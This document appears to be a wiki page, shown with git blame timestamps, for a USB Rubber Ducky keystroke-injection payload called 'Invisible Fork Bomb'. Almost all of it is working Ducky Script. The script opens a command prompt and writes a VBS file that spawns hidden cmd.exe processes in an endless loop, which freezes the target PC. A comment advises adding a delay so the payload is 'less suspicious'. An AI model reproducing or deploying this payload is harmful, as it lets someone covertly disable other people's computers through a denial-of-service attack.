wiki-rubber-ducky-usb/Invisible-Fork-Bomb.md

32 lines
752 B
Markdown
Raw Normal View History

2017-04-20 16:42:28 +02:00
# Invisible Fork Bomb
2017-04-20 16:51:49 +02:00
The script creates and starts a vbs that executes exponentially cmd.exe without visible windows (Fork bomb -> Freezes the PC).
2017-04-20 16:42:28 +02:00
# About...
Author: [BlueArduino20](https://github.com/BlueArduino20/)
Version 1.0
Repository: [https://github.com/BlueArduino20/Invisible_fork_bomb](https://github.com/BlueArduino20/Invisible_fork_bomb)
# Code
<pre><code>
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 500
STRING copy con forkb.vbs
ENTER
STRING do
ENTER
STRING CreateObject("Wscript.Shell").Run "cmd", 0, False
ENTER
STRING loop
CTRL z
ENTER
DELAY 50
REM STRING ping localhost -n 10
REM You can uncomment this ^ to delay 10 seconds before starting the fork bomb. (By this way it's less suspicious)
STRING start forkb.vbs
ENTER
</pre></code>